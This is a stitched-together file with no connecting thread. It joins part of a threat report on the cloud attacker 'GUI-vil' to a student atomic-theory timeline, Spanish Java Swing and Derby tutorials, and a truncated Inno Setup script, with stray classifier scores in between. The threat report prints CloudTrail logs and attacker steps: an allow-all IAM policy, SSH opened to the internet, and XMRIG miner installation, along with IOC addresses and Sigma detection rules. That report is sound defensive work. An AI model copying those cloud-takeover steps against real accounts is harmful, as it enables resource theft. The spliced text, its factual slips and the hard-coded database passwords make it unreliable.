"passwordResetRequired": false }, "responseElements": { "loginProfile": { "userName": "andy", "createDate": "Apr 18, 2023 3:27:29 PM", "passwordResetRequired": false } }, "requestID": "281e395e-3614-44f6-8531-5bcdca3a5507", "eventID": "4ced3dd4-1ab7-4e23-b659-7ca7d88c5d6e", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "redacted", "eventCategory": "Management", "tlsDetails": { "tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "iam.amazonaws.com" } iam:GetLoginProfile with error showing that a login profile does not currently exist { "eventVersion": "1.08", "userIdentity": { "type": "IAMUser", "principalId": "redacted", "arn": "arn:aws:iam::redacted:user/terraform", "accountId": "redacted", "accessKeyId": "AKIA****", "userName": "terraform" }, "eventTime": "2023-04-18T15:27:29.0000000Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateLoginProfile", "awsRegion": "us-east-1", "sourceIPAddress": "36.85.110.142", "userAgent": "S3 Browser 9.5.5 https://s3browser.com", "requestParameters": { "userName": "andy", "passwordResetRequired": false }, "responseElements": { "loginProfile": { "userName": "andy", "createDate": "Apr 18, 2023 3:27:29 PM", "passwordResetRequired": false } }, "requestID": "281e395e-3614-44f6-8531-5bcdca3a5507", "eventID": "4ced3dd4-1ab7-4e23-b659-7ca7d88c5d6e", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "redacted", "eventCategory": "Management", "tlsDetails": { "tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "iam.amazonaws.com" } } iam:CreateLoginProfile for the user that did not have a login profile already defined When GUI-vil creates IAM users, they also directly attach an inline policy via iam:PutUserPolicy to grant their user full privileges. { "userName": "backup", "policyName": "backupuser", "policyDocument": "{\\r\\n \\"Statement\\": [\\r\\n {\\r\\n \\"Effect\\": \\"Allow\\",\\r\\n \\"Action\\": \\"*\\",\\r\\n \\"Resource\\": \\"*\\",\\r\\n \\"Condition\\": {}\\r\\n }\\r\\n ]\\r\\n}" } iam:PutUserPolicy to add inline policy granting full privileges to newly created user Maintain Presence (EC2) While they can maintain presence on the infrastructure level via the users and access keys they have created or taken over, the attacker can also maintain persistence to the environment via EC2. Simply by being able to connect to the EC2 instance they can assume the credentials of the EC2 instance. Often times the attacker will execute ec2:CreateKeyPair, enabling them to connect to the EC2 instance directly via SSH which they ensure is open to the internet on any EC2 instances they create. "data": { "eventVersion": "1.08", "userIdentity": { "type": "AssumedRole", "principalId": "AROA****:andy", "arn": "arn:aws:sts::redacted:assumed-role/AdminUser/andy", "accountId": "redacted", "accessKeyId": "ASIA*****", "sessionContext": { "sessionIssuer": { "type": "Role", "principalId": "AROA****", "arn": "arn:aws:iam::redacted:role/AdminUser", "accountId": "redacted", "userName": "AdminUser" }, "webIdFederationData": {}, "attributes": { "creationDate": "2023-04-18T15:30:24.0000000Z", "mfaAuthenticated": "false" } } }, "eventTime": "2023-04-18T15:33:12.0000000Z", "eventSource": "ec2.amazonaws.com", "eventName": "CreateKeyPair", "awsRegion": "us-east-1", "sourceIPAddress": "36.85.110.142", "userAgent": "AWS Internal", "requestParameters": { "keyName": "su32", "keyType": "rsa", "keyFormat": "ppk" }, "responseElements": { "requestId": "21e1134f-109e-4b4a-bea8-cc651b9e0db8", "keyName": "su32", "keyFingerprint": "e9:86:03:1e:81:4e:65:fb:78:41:f0:32:e0:29:ff:6e:9b:0e:fe:f0", "keyPairId": "key-0123456789abcdef0", "keyMaterial": "<sensitiveDataRemoved>" }, "requestID": "21e1134f-109e-4b4a-bea8-cc651b9e0db8", "eventID": "9338ea0b-b929-4a76-b024-2b3ea36cd484", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "redacted", "eventCategory": "Management", "sessionCredentialFromConsole": "true" } ec2:CreateKeyPair to create public and private key pair for remote access { "groupId": "sg-0123456789abcdef0", "ipPermissions": { "items": [ { "ipRanges": { "items": [ { "cidrIp": "0.0.0.0/0" } ] }, "prefixListIds": {}, "fromPort": 22, "toPort": 22, "groups": {}, "ipProtocol": "tcp", "ipv6Ranges": {} } ] } ec2:AuthorizeSecurityGroupIngress to add inbound (ingress) rule for port 22 to specified security group Complete Mission GUI-vil is financially motivated. They create EC2 instances in victim AWS organizations that they then use for crypto mining. Often times as they encounter resource limitations set by the victim organizations they will switch to other regions and attempt again. All EC2 instances they created have had these attributes: • Size xlarge and bigger (c4.4xlarge, p3.16xlarge, p3.2xlarge, p3.8xlarge) • TCP/22 open to 0.0.0.0 • IPv4 Enabled, IPv6 Disabled • Detailed CloudWatch monitoring disabled • Xen hypervisor Once an EC2 instance is created they connect to it via SSH, install required packages, then install and launch XMRIG: • apt-get update • apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y • /home/ubuntu/xmrig Indicators Atomic Indicators Indicator Type Notes 182.1.229.252 IPv4 PT. Telekomunikasi Selular 114.125.247.101 IPv4 PT. Telekomunikasi Selula 114.125.245.53 IPv4 PT. Telekomunikasi Selula 114.125.247.101 IPv4 PT. Telekomunikasi Selula 114.125.232.189 IPv4 PT. Telekomunikasi Selula 114.125.228.81 IPv4 PT. Telekomunikasi Selula 114.125.229.197 IPv4 PT. Telekomunikasi Selula 114.125.246.235 IPv4 PT. Telekomunikasi Selula 114.125.246.43 IPv4 PT. Telekomunikasi Selula 36.85.110.142 IPv4 PT Telekomunikasi Indonesia S3 Browser 9.5.5 https://s3browser.com/ UA   [S3 Browser 9.5.5 https://s3browser.com/ ] UA   su32 SSH Key Name   new-user-<8 alphanumeric characters> IAM User default naming standard for creating a user with S3 Browser sec_audit IAM User   sdgs IAM Policy   ter IAM Policy   backup IAM User   dq IAM Policy   Detections Permiso CDR Rules Permiso clients are protected from these attackers by the following detections: Permiso Detections P0_AWS_S3_BROWSER_USERAGENT_1 P0_MULTI_NEFARIOUS_USERAGENT_1 P0_AWS_SUSPICIOUS_ACCOUNT_NAME_CREATED_1 P0_GENERAL_SUSPICIOUS_ACCOUNT_NAME_CREATED_1 P0_COMMON_USER_ACTIVITY_NO_MFA_1 P0_AWS_IAM_INLINE_POLICY_ALLOW_ALL_1 P0_AWS_IAM_INLINE_POLICY_SHORT_NAME_1 P0_AWS_IAM_INLINE_POLICY_PASSROLE_1 P0_AWS_IAM_INLINE_POLICY_TEMPLATE_LANGUAGE_1 P0_AWS_EC2_MULTI_REGION_INSTANCE_CREATIONS_1 P0_AWS_HUMAN_CREATED_LARGE_EC2_1 P0_AWS_EC2_STARTED_CIDR_FULL_OPEN_PORT_22_1 For folks not on the Permiso platform, here are some basic sigma rules that can be used to identify GUI-vil: S3 Browser - IAM Policy w/Templated Language title: AWS IAM S3Browser Templated S3 Bucket Policy Creation id: db014773-7375-4f4e-b83b-133337c0ffee status: experimental description: Detects S3 Browser utility creating Inline IAM Policy containing default S3 bucket name placeholder value of <YOUR-BUCKET-NAME>. references: - <https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor> author: [email protected] (@danielhbohannon) date: 2023/05/17 modified: 2023/05/17 tags: - attack.execution - attack.t1059.009 - attack.persistence - attack.t1078.004 logsource: product: aws service: cloudtrail detection: selection_source: eventSource: iam.amazonaws.com eventName: PutUserPolicy filter_tooling: userAgent|contains: 'S3 Browser' filter_policy_resource: requestParameters|contains: '"arn:aws:s3:::<YOUR-BUCKET-NAME>/*"' filter_policy_action: requestParameters|contains: '"s3:GetObject"' filter_policy_effect: requestParameters|contains: '"Allow"' condition: selection_source and filter_tooling and filter_policy_resource and filter_policy_action and filter_policy_effect falsepositives: - Valid usage of S3 Browser with accidental creation of default Inline IAM Policy without changing default S3 bucket name placeholder value level: high S3 Browser - IAM LoginProfile title: AWS IAM S3Browser LoginProfile Creation id: db014773-b1d3-46bd-ba26-133337c0ffee status: experimental description: Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile. references: - <https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor> author: [email protected] (@danielhbohannon) date: 2023/05/17 modified: 2023/05/17 tags: - attack.execution - attack.t1059.009 - attack.persistence - attack.t1078.004 logsource: product: aws service: cloudtrail detection: selection_source: eventSource: iam.amazonaws.com eventName: - GetLoginProfile - CreateLoginProfile filter_tooling: userAgent|contains: 'S3 Browser' condition: selection_source and filter_tooling falsepositives: - Valid usage of S3 Browser for IAM LoginProfile listing and/or creation level: high S3 Browser - IAM User and AccessKey title: AWS IAM S3Browser User or AccessKey Creation id: db014773-d9d9-4792-91e5-133337c0ffee status: experimental description: Detects S3 Browser utility creating IAM User or AccessKey. references: - <https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor> author: [email protected] (@danielhbohannon) date: 2023/05/17 modified: 2023/05/17 tags: - attack.execution - attack.t1059.009 - attack.persistence - attack.t1078.004 logsource: product: aws service: cloudtrail detection: selection_source: eventSource: iam.amazonaws.com eventName: - CreateUser - CreateAccessKey filter_tooling: userAgent|contains: 'S3 Browser' condition: selection_source and filter_tooling falsepositives: - Valid usage of S3 Browser for IAM User and/or AccessKey creation level: high Observed Events (write level): ec2:AuthorizeSecurityGroupIngress ec2:CreateKeyPair ec2:CreateSecurityGroup ec2:CreateTags ec2:RunInstances ec2:TerminateInstances iam:CreateAccessKey iam:CreateLoginProfile iam:CreateUser iam:DeleteAccessKey iam:DeleteLoginProfile iam:DeleteUser iam:DeleteUserPolicy iam:PutUserPolicy signin:ExitRole signin:SwitchRole Illustration Cloud Related Articles Introducing Cloud Console Cartographer: An Open-Source Tool To Help Security Teams Easily Understand Log Events Generated by AWS Console Activity Introduction While most cloud CLI tools provide a one-to-one correlation between an API being invoked and a single corresponding API event being generated in cloud log telemetry, browser-based interactive console sessions differ profoundly across An Adversary Adventure with Cloud Administration Command Introduction As the cybersecurity landscape rapidly evolves, organizations are implementing multi-cloud solutions to advance their digital transformation initiatives. On the other hand, threat actors are unrelenting in developing sophisticated Introducing CloudGrappler: A Powerful Open-Source Threat Detection Tool for Cloud Environments IntroductionWith the increased activity of threat actor groups like LUCR-3 (Scattered Spider) over the last year, being able to detect the presence of these threat groups in cloud environments continues to present a significant challenge to most View more posts
__label__pos
0.506306
Trike2 History of the Atom Project (wesley bradley) • 492 BCE Democritus formulates his atomic theory. (Approx. Date) Democritus formulates his atomic theory. (Approx. Date) Democritus formulates his atomic theory; his atomic theory is the first of its kind, and says that all things are made up of indivisible, invisible, always moving, and unique particles. • Period: 460 BCE to 370 BCE Democritus' Lifetime Democritus' Lifetime • Lavoisier is born Antoine Lavoisier is born in Paris, France. • Period: to Antoine Lavoisier's Lifetime Antoine Lavoisier's Lifetime • Lavoisier attends the College of Four Nations • John Dalton born John Dalton is born to a quaker family in Cumberland, England • Period: to John Dalton's Lifetime Dalton built upon Democritus’ atomic theory, which had since been unchanged or rebuffed for two millennia. • Lavoisier discovers that the masses of objects stays the same after the object goes under a chemical change. • The elements oxygen and hydrogen are officially named The elements oxygen and hydrogen are officially named by Antoine Lavoisier • Antoine Lavoisier writes his first chemistry book. • Lavoisier dies Antoine Lavoisier dies at the age of 50 in Paris, France; his spouse dies the same year • Dalton orally presented some of his scientific papers on the subjects of vapor, steam, pressure, etc. • Atomic theory published John Dalton announces his famous atomic theory that built upon Democritus’ theory to the scientific community. • John Dalton dies John Dalton dies in Manchester; 40,000 people attend his funeral. • JJ Thomson born JJ Thomson is born in Cheetham Hill, England • Period: to JJ Thomsons's Lifetime Thomson determined that matter was made up of miniscule particles - smaller than atoms, called ‘corpuscles,’ although the name never stuck. They are what we know of as electrons, and his discovery upended the current theory that the atom was the smallest unit in existence. He also determined that electrons were negatively charged, but recognized that because matter is neutrally charged, there must be a positive charge within each atom to negate the electron’s effects. • Max Planck born Max Planck is born in Kiel, Holstein, Gemany • Period: to Max Planck's Lifetime He is considered by the scientific community to be founder of quantum theory. He presented a theoretical explanation as to the spectrum of radiation emitted by a glowing object. He believed that the walls of an object could have a series of resonators that oscillated at different frequencies; essentially leading him to believe that energy does not flow in a steady continuum. • Marie Curie born Marie Curie is born in Warsaw, Poland; at the time it was part of the Russian Empire • Period: to Marie Curie's Lifetime She discovered the elements radium and polonium, and was influential in the medical fields for her experiments relating to radiation. She predicted that atoms stored immense energy inside themselves, and that radioactive energy came from within atoms, and that the Earth was already completely covered in it. She invented the word ‘radioactivity’ for her findings. • Robert Millikan born Robert Millikan was born in Morrison, Illinois • Period: to Robert Millikan's Lifetime He determined the exact charge of an electron in 1909, and created a way of calculating the mass of the electrons and positively charged portions of the atom. He discovered that the mass of an electron - which is always the same, is 1000 time smaller than the smallest atom discovered at the time. • Ernest Rutherford born Ernest Rutherford was born on a farm in a New Zealand village, the fourth of twelve children. • Period: to Ernest Rutherford's Lifetime He was responsible for a series of outstanding discoveries in the fields of radioactivity and nuclear physics. Specifically, he discovered the existence of alpha and beta rays, produced the laws of radioactive decay, and hypothesized the nuclear structure of the atom. His hypothesis of the atom is the most accurate, with protons in the nucleus and electrons orbiting them. • Albert Einstein is born in Ulm, Germany • Period: to Albert Einstein's Lifetime Einstein devised a way of predicting the sizes of atoms and molecules. Along with many other scientific contributions, he developed the quantum theory of heat, and the theory of relativity, and some other stuff. • JJ Thomson is appointed a professor of physics at Cavendish College • Planck is appointed professor extraordinaire at the University of Kiel • Niels Bohr born in Copenhagen, Denmark • Period: to Niels Bohr's Lifetime He made remarkable contributions to the fields of quantum theory, and devised the bohr model, which assisted in the portrayal of atomic structure and is still in use in modern day. He also proposed the idea of the nucleus as a liquid drop. • Erwin Schrodinger born in Erdberg, Vienna, Austria • Period: to Erwin Schrodinger's Lifetime He provided the basis for bohr’s famous atomic model by devising a model to find where an electron of an atom would be at any given time. • James Chadwick born James Chadwick is born in bollington, England • Period: to James Chadwick's Lifetime In 1932 his research lead to him discovering that inside the nucleus of an atom were neutrons, which contained a neutral charge, unlike protons or electrons. This discovery was pivotal to the later discovery of nuclear fission, which would later assist in the building of atomic bombs. • Louis de Broglie born in Dieppe, France • Period: to Louis de Broglie's Lifetime His ideas assisted in the complete development of the wave mechanics theory - a theory that stated that electrons can act like both particles and waves; waves produced by electrons constrained in the orbit around the nucleus of an atom, set up a standing wave of energy, frequency, and wavelength. • Rutherford wins a scholarship to Cambridge University • Thomson begins his investigations • Marie marries Pierre Curie • Thomson finds that cathode rays can be deflected in an electric field. • Rutherford discovers Radon gas • Planck announces his findings to the German physics society • Werner Heisenberg is born • Period: to Werner Heisenberg's Lifetime His contributions to physics was the famous principle of uncertainty, which stated that the determination of the position and momentum of a non-static particle contain errors that cannot be less than the quantum constant, and although the errors are negligible on a human scale, they cannot be ignored on a molecular or scientific scale. • Marie Curie discovers pure Radium • Marie and Pierre Curie share Nobel Prize • Albert Einstein publishes his first paper on thermodynamics • JJ Thomson awarded Nobel Prize • Marie Curie widowed; Pierre Curie dies • JJ Thomson given the Order of Merit and knighted • Rutherford awarded the Nobel Prize in chemistry • Millikan began his experiments Began his experiments; determined the exact charge of an electron and created a way of formulating the mass of the electrons and positively charged protons in an atom. • Einstein becomes professor extraordinaire at Zurich University • Rutherford discovers the nucleus via the gold foil experiment • Marie Curie wins Nobel Prize • Bohr began to work in Rutherford's laboratories • Niels Bohr published his findings on atomic structure • Ernest Rutherford is knighted • Broglie joins the French army as an engineer • Bohr becomes a professor at Copenhagen University • Max Planck awarded Nobel Prize • Schrodinger is drafted into the army as an artillery corpsman • James chadwick studies under the guise of Rutherford • Millikan became the director of Caltech • Einstein wins a Nobel Prize • Bohr wins a Nobel Prize • Robert Millikan awarded Nobel Prize • James Chadwick ends his studies on radioactivity • Louis de Broglie publishes research papers on electrons and quantum structures • Heisenberg publishes his quantum theories • Erwin Schrodinger makes his famous wave equation theory • Broglie awarded a Nobel Prize • Chadwick discovers definite proof that neutrons exist within the nucleus • Werner Heisenberg given a Nobel Prize • Albert Einstein emigrates from Germany • Schrodinger awarded a Nobel Prize • Marie Curie dies in Sallanches, France • James Chadwick awarded a Nobel Prize • Ernest Rutherford dies • JJ Thomson dies • Max Planck dies • Albert Einstein dies of heart failure • Robert Millikan dies • Erwin Schrodinger dies in Vienna, Austria • Niels Bohr dies • James Chadwick dies • Heisenberg dies • Louis de Broglie dies at Louiveciennes, France
__label__pos
0.641694
Código Java – Cambiar la Apariencia de la Interfaz Gráfica con LookAndFeel Este es el Ejemplo #18 del Topic: Programación Gráfica en Java. En este post vamos a jugar un poco porque aprenderemos a cambiar la apariencia de todos los componentes y contenedores de Java haciendo uso de las librerías del tipo LookAndFeel, todo esto con tan solo unas cuantas lineas de código que servirá para todo el proyecto sin importar de cuantos formularios o frames esté compuesto. El Framework de java trae ya incluido algunos diseños que podemos usar directamente, esto no quiere decir que sean los únicos, los LookAndFeel podemos crearlo nosotros, personalizarlo o conseguirlo por medio de terceros. En este ejemplo muestro los que trae por defecto y agrego uno más a las librerías del proyecto, que lo encontré en los repositorios de Google Code y me por cierto se ve muy bien; es el seaglasslookandfeel. Descargar: SeaGlassLookAndFeel El código mostrará un frame con algunos componentes típicos añadidos, y en un ComboBox, los estilos que tomarán inmediatamente al seleccionarlo. Para empezar, muestro la función que creo es la esencia, el cual recibirá como parámetro el estilo que se dará a la GUI: ... private void setLookAndFeel(String laf) { if (laf==null) { laf=UIManager.getSystemLookAndFeelClassName(); } else { try { UIManager.setLookAndFeel(laf); } catch (InstantiationException ex) { } catch (ClassNotFoundException ex) { } catch (UnsupportedLookAndFeelException ex) { } catch (IllegalAccessException ex) { } } SwingUtilities.updateComponentTreeUI(this); } ... Código de Ejemplo: /** * seaglasslookandfeel-0.1.5.jar */ package beastieux.gui; import java.awt.GridLayout; import javax.swing.DefaultComboBoxModel; import javax.swing.JButton; import javax.swing.JCheckBox; import javax.swing.JComboBox; import javax.swing.JFrame; import javax.swing.JPanel; import javax.swing.JTextField; import javax.swing.SwingUtilities; import javax.swing.UIManager; import javax.swing.UnsupportedLookAndFeelException; /** * * @author beastieux */ public class Ejm18_LookAndFeel extends JFrame { JComboBox cmb1=new JComboBox(); public Ejm18_LookAndFeel() { JPanel pnlEjemplo=new JPanel(); JTextField txt1=new JTextField(); JCheckBox chk1=new JCheckBox("Opcion 1"); cmb1.setModel(new DefaultComboBoxModel (new String[] { "Estilo MetalLookAndFeel", "Estilo MotifLookAndFeel", "Estilo GTKLookAndFeel", "Estilo NimbusLookAndFeel", "Estilo WindowsLookAndFeel", "Estilo SeaGlassLookAndFeel" })); cmb1.addItemListener(new java.awt.event.ItemListener() { public void itemStateChanged(java.awt.event.ItemEvent evt) { cmb1ItemStateChanged(evt); } }); JButton btn1=new JButton("Button 1"); pnlEjemplo.add(txt1); pnlEjemplo.add(cmb1); pnlEjemplo.add(chk1); pnlEjemplo.add(btn1); pnlEjemplo.setLayout(new GridLayout(5,1)); this.add(pnlEjemplo); this.setSize(500, 150); setDefaultCloseOperation(javax.swing.WindowConstants.DISPOSE_ON_CLOSE); } private void cmb1ItemStateChanged(java.awt.event.ItemEvent evt) { switch(cmb1.getSelectedIndex()) { case 0: setLookAndFeel("javax.swing.plaf.metal.MetalLookAndFeel"); break; case 1: setLookAndFeel("com.sun.java.swing.plaf.motif.MotifLookAndFeel"); break; case 2: setLookAndFeel("com.sun.java.swing.plaf.gtk.GTKLookAndFeel"); break; case 3: setLookAndFeel("com.sun.java.swing.plaf.nimbus.NimbusLookAndFeel"); break; case 4: setLookAndFeel("com.sun.java.swing.plaf.windows.WindowsLookAndFeel"); break; case 5: setLookAndFeel("com.seaglasslookandfeel.SeaGlassLookAndFeel"); break; default: setLookAndFeel(null); } } private void setLookAndFeel(String laf) { if (laf==null) { laf=UIManager.getSystemLookAndFeelClassName(); } else { try { UIManager.setLookAndFeel(laf); } catch (InstantiationException ex) { } catch (ClassNotFoundException ex) { } catch (UnsupportedLookAndFeelException ex) { } catch (IllegalAccessException ex) { } } SwingUtilities.updateComponentTreeUI(this); } public static void main(String args[]) { Ejm18_LookAndFeel obj = new Ejm18_LookAndFeel(); obj.setVisible(true); } } Anuncios Código Java – Agregar un Componente JCalendar al Proyecto Este es el Ejemplo #17 del Topic: Programación Gráfica en Java. En el post anterior hablamos sobre los CheckBoxList, ahora tocaremos otro componente también importante y muy usado que es el Calendar. He encontrado muchos componentes de este tipo pero la mayoría de ellos de pago y otros gratuitos pero sin buen diseño. Al final pude encontrar algo en SourceForge y seguramente podría servirnos mucho; es un JCalendar en dos presentaciones, un frame del calendar como tal y la otra modalidad incrustada en un combo. Descargar: JCalendar.jar Luego de descargar el JCalendar.jar vamos a importarlo al proyecto. Para que sea más accesible en el futuro podemos agregar el componente al panel de Beans de la IDE en el cual estamos trabajando y de esa manera solo tendremos que arrastrarlo al contenedor cada vez que tengamos que usarlo. En el siguiente ejemplo agrego ambas presentaciones del JCalendar a JFrame: /** * jcalendar.jar */ package beastieux.gui; import java.awt.FlowLayout; import javax.swing.JFrame; import org.freixas.jcalendar.JCalendar; import org.freixas.jcalendar.JCalendarCombo; /** * * @author beastieux */ public class Ejm17_JCalendar extends JFrame { public Ejm17_JCalendar() { JCalendar calEjemplo1=new JCalendar(); JCalendarCombo calEjemplo2=new JCalendarCombo(); this.add(calEjemplo1); this.add(calEjemplo2); this.setLayout(new FlowLayout()); this.setSize(400, 300); setDefaultCloseOperation(javax.swing.WindowConstants.DISPOSE_ON_CLOSE); } public static void main(String args[]) { Ejm17_JCalendar obj = new Ejm17_JCalendar(); obj.setVisible(true); } } Código Java – Agregar un Componente CheckBoxList al Proyecto Este es el Ejemplo #16 del Topic: Programación Gráfica en Java. A menudo necesitamos hacer uso de algunos componentes especiales pero no contamos con ellos, a veces lo que nos ofrece la plataforma de desarrollo no nos es suficiente y la opción está en crear nuestros propios componentes. Pero sin embargo existe otra posibilidad como comprar componentes de terceros o conseguirlo de manera gratuita, apuesto a que la mayoría lo prefiere de la última forma. Recuerdo que hace tiempo hice un post sobre un buscador de componentes gratuitos para java, es lo que nos ayudará en esta oportunidad. Uno de esos componentes que tanto necesitamos es el CheckBoxList o CheckListBox como prefieran llamarlo, el cual no lo obtenemos en la lista de componentes por defecto, por lo menos no en NetBeans u otros que he visto, por ello vamos a descargarlo e importarlo al proyecto que estamos desarrollando. Una vez importado, dentro del JAR descargado tendremos varios otros componentes, pero lo que nos interesa probar ahora es el CheckBoxList que se encuentra en: com.jidesoft.swing.CheckBoxList De todos los componentes de este tipo que he encontrado y probado puedo decirles que este es el más recomendado para usarlo. Ahora veamos un ejemplo de como se usa , verán que es super sencillo: /** * jide-oss-2.4.8.jar */ package beastieux.gui; import com.jidesoft.swing.CheckBoxList; import javax.swing.DefaultListModel; import javax.swing.JFrame; import javax.swing.JScrollPane; /** * * @author beastieux */ public class Ejm16_JCheckListBox extends JFrame { public Ejm16_JCheckListBox() { CheckBoxList cblEjemplo = new CheckBoxList(); JScrollPane scpEjemplo=new JScrollPane(); DefaultListModel lmdlEjemplo=new DefaultListModel(); lmdlEjemplo.addElement("Item 0"); lmdlEjemplo.addElement("Item 1"); lmdlEjemplo.addElement("Item 2"); lmdlEjemplo.addElement("Item 3"); lmdlEjemplo.addElement("Item 4"); lmdlEjemplo.addElement("Item 5"); lmdlEjemplo.addElement("Item 6"); lmdlEjemplo.addElement("Item 7"); lmdlEjemplo.addElement("Item 8"); lmdlEjemplo.addElement("Item 9"); cblEjemplo.setModel(lmdlEjemplo); scpEjemplo.add(cblEjemplo); this.add(scpEjemplo); scpEjemplo.setViewportView(cblEjemplo); scpEjemplo.setSize(100, 150); this.setLayout(null); this.setSize(300, 400); setDefaultCloseOperation(javax.swing.WindowConstants.DISPOSE_ON_CLOSE); } public static void main(String args[]) { Ejm16_JCheckListBox obj = new Ejm16_JCheckListBox(); obj.setVisible(true); } } Código Java – Conexión a Base de Datos Apache Derby (Embebida y Cliente – Servidor) Este es el Ejemplo #12.3 del Topic: Programación Gráfica en Java, que viene a formar parte del Topic #12 Código Java – Establecer Conexión a Base de Datos con JDBC Como he explicado en el Topic #12, para realizar las conexiones necesitaremos los drivers respectivos, de acuerdo al motor de base de datos al cual deseemos conectarnos. En este ejemplo estableceremos una conexión con Apache Derby en sus modalidades Embebida y Cliente-Servidor, para el cual es necesario contar con las respectivas librería que pueden ser similares a las que se muestran a continuación: derby.jar (Embebida) derbyclient.jar (Cliente - Servidor) Estas dos librerías corresponden para una base de datos Apache Derby Embebida y Cliente Servidor respectivamente. Si Derby ha sido instalada de la modalidad mostrada en el post Instalación y Ejecución de Apache Derby en Linux, las librerías podrán ubicarse en las siguientes rutas: /usr/lib/jvm/java-6-sun/db/lib/derby.jar /usr/lib/jvm/java-6-sun/db/lib/derbyclient.jar En caso contrario, las librerías deberán ser obtenidas de medios externos. Ustedes deberán conseguir la librería de acuerdo a la versión de Derby al cual deseen conectarse y establecer los parámetros de conexión como se muestra en el código siguiente: Conexión a Base de Datos Derby Cliente – Sevidor: package beastieux.gui; import java.sql.Connection; import java.sql.DriverManager; import java.sql.Statement; import java.sql.ResultSet; import javax.sql.rowset.CachedRowSet; import com.sun.rowset.CachedRowSetImpl; /** * * @author beastieux */ public class Ejm12_3_ConectarDerby { public CachedRowSet Function(String sql) { try { Class.forName("org.apache.derby.jdbc.ClientDriver"); String url = "jdbc:derby://localhost:1527/dbtest"; Connection con = DriverManager.getConnection(url); Statement s = con.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE, ResultSet.CONCUR_READ_ONLY); ResultSet rs= s.executeQuery(sql); CachedRowSet crs = new CachedRowSetImpl(); crs.populate(rs); rs.close(); s.close(); con.close(); return crs; } catch(Exception e) { System.out.println(e.getMessage()); } return null; } public void StoreProcedure(String sql) { try { Class.forName("org.apache.derby.jdbc.ClientDriver"); String url = "jdbc:derby://localhost:1527/dbtest"; Connection con = DriverManager.getConnection(url); Statement s = con.createStatement(); s.execute(sql); s.close(); con.close(); } catch(Exception e) { System.out.println(e.getMessage()); } } } Conexión a Base de Datos Derby Embebida: package beastieux.gui; import java.sql.Connection; import java.sql.DriverManager; import java.sql.Statement; import java.sql.ResultSet; import javax.sql.rowset.CachedRowSet; import com.sun.rowset.CachedRowSetImpl; /** * * @author beastieux */ public class Ejm12_3_ConectarDerby { public CachedRowSet Function(String sql) { try { Class.forName("org.apache.derby.jdbc.EmbeddedDriver"); String url = "jdbc:derby:/home/beastieux/dbtest"; Connection con = DriverManager.getConnection(url); Statement s = con.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE, ResultSet.CONCUR_READ_ONLY); ResultSet rs= s.executeQuery(sql); CachedRowSet crs = new CachedRowSetImpl(); crs.populate(rs); rs.close(); s.close(); con.close(); return crs; } catch(Exception e) { System.out.println(e.getMessage()); } return null; } public void StoreProcedure(String sql) { try { Class.forName("org.apache.derby.jdbc.EmbeddedDriver"); String url = "jdbc:derby:/home/beastieux/dbtest"; Connection con = DriverManager.getConnection(url); Statement s = con.createStatement(); s.execute(sql); s.close(); con.close(); } catch(Exception e) { System.out.println(e.getMessage()); } } } En el caso de conexión a base de datos embebida, la URL contiene la ubicación de la base de datos la cual deberá ser reemplazado de acuerdo a su propia configuración: String url = "jdbc:derby:/home/beastieux/dbtest"; Métodos de Ordenamiento Hechos en Python Los primeros posts que realizo sobre Python estarán dedicados a los métodos de ordenamiento. Hasta el momento la codificación en python me ha sorprendido mucho porque es muy sencilla, limpia, no necesitas escribir mucho a comparación de otros lenguajes de programación. Si te gusta la programación te aseguro que python te va a encantar. Aquí les dejos los métodos de ordenamiento escritos en Python: Método Burbuja: Ordenamiento Burbuja.py Método Shell: Ordenamiento Shell.py Método QuickSort: Ordenamiento por método QuickSort.py Método Inserción Directa: Ordenamiento por inserción Directa.py Método Inserción Binaria: Ordenamiento por inserción Binaria.py Método Selección: Ordenamiento método Selección.py Método HeapSort: Ordenamiento método HeapSort.py
__label__pos
0.881433
Skip to main content Inno installation script: VB6, MSDE, MDAC An Inno installation script I wrote to install a VB6 application and optionally, MSDE and MDAC. It also executes several database scripts as well as prompts the user to install MSDE or choose an existing SQL Server database. ; MyApp Install Script ; Author: Jeff Hunsaker ; Version: 1.0.0.0 #define AppName "MyApp" #define AppNameLong "My App" #define AppPublisher "My Firm, Inc." #define Ver1 "1" #define Ver2 "0" #define Ver3 "0" #define Ver4 "0" #define MinVersion "4.1.1998,4.0.1381sp5" #define DBInstance "DBInstance" ;when MSDE installed locally/new #define DBDatabase "DBDatabase" #define DBDefaultSaPassword "sapassword" #define DBDefaultSaAccount "sa" #define DBAppUserName "AppUser" #define DBAppPassword "password" #define DBDefaultServer "(LOCAL)" #define DBDSN "MyApp" #define DBDSNDescription = "My App" [Setup] MinVersion={#MinVersion} OnlyBelowVersion=0,0 AppCopyright=© 2005 {#AppPublisher} AppName={#AppNameLong} AppVerName={#AppNameLong} {#Ver1}.{#Ver2}.{#Ver3}.{#Ver4} PrivilegesRequired=admin AllowRootDirectory=true AllowUNCPath=false ShowLanguageDialog=no WizardImageFile=logos\some.bmp WizardImageStretch=no AppID={{42F4A6D5-72BF-4C3E-AFE9-A345C13C842D} AppMutex={#AppName} DefaultDirName={pf}\{#AppName} EnableDirDoesntExistWarning=true AlwaysShowComponentsList=false DisableReadyPage=no LanguageDetectionMethod=none AppPublisher={#AppPublisher} AppPublisherURL=http://www.myfirm.com/ AppVersion={#Ver1}.{#Ver2} UninstallDisplayName={#AppNameLong} {#Ver1}.{#Ver2}.{#Ver3}.{#Ver4} UserInfoPage=yes UsePreviousUserInfo=yes DefaultGroupName={#AppName} DisableProgramGroupPage=yes [_ISTool] LogFile=cwinstall.log LogFileAppEND=true [Icons] Name: {group}\{#AppName}; Filename: {app}\{#AppName}.exe; WorkingDir: {app} Name: {group}\{cm:UninstallProgram, 